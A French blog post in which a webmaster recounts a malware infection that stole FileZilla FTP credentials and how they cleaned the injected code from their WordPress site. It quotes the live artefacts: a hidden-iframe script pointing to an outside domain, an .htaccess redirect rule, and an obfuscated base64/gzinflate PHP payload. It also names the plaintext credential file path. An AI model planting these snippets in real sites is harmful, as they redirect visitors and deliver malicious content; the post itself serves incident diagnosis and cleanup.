20 juillet 2012 ~ 0 Commentaires

Les virus de type « Iframe »

Bon ça faisait un petit moment que je n’avais pas eu le temps d’écrire quelques lignes sur ce blog mais forcément il faut qu’un truc énervant m’arrive pour me pousser à le faire :p

Les virus c’est très sournois de nos jours..

Mon pc s’est fait contaminer par un virus (je vous passerais les détails du comment..), ce qui m’a engendré pas mal de soucis numériques .

  • Accès à mon compte Gmail depuis la chine (heureusement que Google détecte ce genre de connexion suspectes et vous incite à changer votre mot de passe rapidement)
  • Blocage de mon compte Battle.net pour « activités suspectes »
  • et le ponpon :

  • Vol de mes identifiants enregistrés dans le « gestionnaire de sites » FileZilla + infections des sites associés par un virus qui injecte/redirige vers de la publicité.

Pour Battle.net et Gmail je pense que le virus Keylog ce que j’ai tapé au clavier.

Par contre pour FileZilla c’est clairement un problème de sécurité du logiciel … c’est connu depuis assez longtemps que les comptes sont stockés en clair dans :

C:\Users\%username%\AppData\Roaming\FileZilla\sitemanager.xml

c’est très moche mais par flemme on fais pas trop attention .. jusqu’à ce que l’improbable arrive …

Lorsque je faisait une requête sur mon site, Avast me signalais une infection.. donc j’ai commencé a regarder ce qui se chargeais en Javascript.. et effectivement il y avait des trucs louche:

Une page « counter.php » était chargée depuis un domaine externe.
Le plus drôle c’est quelle retourne un 404 l’air de rien genre « mais non t’inquiète pas je n’ai rien chargé » mais en fait elle appelais d’autres fichier javascript. (l’inspecteur réseau d’opéra ou de chrome aide beaucoup à diagnostiquer ce genre de choses):

Donc j’ai regardé un peu dans la source générée de mon index. Dans le HEAD, il y avait effectivement un script Javascript correspondant:

?View Code JAVASCRIPT
1
2
3
4
5
6
7
8
9
10
<script>
	var _q = document.createElement('iframe'),_n = 'setAttribute';
	_q[_n]('src', 'http://pdabattery.net/ads/counter.php');
	_q.style.position = 'absolute';
	_q.style.width = '16px';
	_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7d03d1087e22') + 1);
	_q.style.left = '-6200px';
	document.write('<div id=\'pzadv\'></div>');
	document.getElementById('pzadv').appendChild(_q);
</script>

Vu que j’utilise un CMS, je ne savais pas vraiment où regarder, alors je me suis servi de la fonction de recherche dans les sous dossiers de Notepad++:

J’ai essayé de chercher « counter.php » par exemple, qui est la fin de l’url présente dans le script.
-> 0 résultat

Comment c’est possible ?

Un peu a cours d’idée j’ai décidé de regarder ce qui est présent dans le .htaccess à la racine du site.
Bingo! Lui aussi a été modifié:

?View Code HTACCESS
1
2
3
4
5
6
7
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|etc...)\.(.*)
RewriteRule ^(.*)$ http://niu-sae.com/stats.php [R=301,L]
</IfModule>
#/c3284d#

Le commentaire « #c3284d# » m’interpelle, en cherchant sur Google j’apprends que c’est un virus connu ..
(Au moins il a la politesse de se présenter ^^).
Du coup je retente ma recherche sur Notepad++ avec cet identifiant: 10 résultats dans 5 fichiers ! Cool!

Le script se cachais dans chaque fichier « header.php » de mes thèmes WordPress.
Et si je ne l’ai pas trouvé grâce à l’url tout à l’heure c’est parce que le script est codé en Base64 ! (pour éviter de trouver facilement le script je présume).

1
2
3
#c3284d#
echo(gzinflate(base64_decode("VVHBboMwDL1X4h9yC2hdKDCVbqOVummHnfYB64RCYkokmqSJS9t9/YChavPN9nt+9nPhhVMWN8Gs446UR7Im0ojTATQy4YAjvLUwZCFVteMHoNE8mJE+St1jqQfcIjpVnRDoczArj5+l/gqpd4LOCW0Q7VMcC15xrbiHFiRoJsyBcRd75OiZbSyNRibzeG2BWeMVKjOO55U37W30BDgric3QTVJ7+Ss6LlgZJ8H14pp3as/ROHby4Lb74SSlJVw+6pBmjyLL0uWiXsp8mSeQSg55vVjJZLHKIU1pRO5I8m+vFmocVO8fsjT/Fb5ZdXYKIaSFVB1Rcr2j9hu47HZ0U8R9bTNeeEPvASdXX67vMpzANGLcWtDytVGtDMvjwCni6UE/")));
#/c3284d#

Voila ! Pour nettoyer le site de ce virus il suffis de supprimer ces lignes de tous vos fichiers !

Pour conclure je pense que je ne me servirais plus du gestionnaire de site de FileZilla et même si c’est moins pratique..me forcer à utiliser KeePass (un ge
estionnaire de mot de passes sécurisé) !

Ah oui, n’oubliez pas de changer tous vos mots de passe après un truc comme ça !

Liens utiles:

Notepad++: http://notepad-plus-plus.org/fr/
KeePass: http://keepass.info/

Références:

IFrame Virus: http://en.wikipedia.org/wiki/Iframe_virus
Une personne qui a eu le même soucis : http://wondercms.com/forum/viewtopic.php?f=6&t=48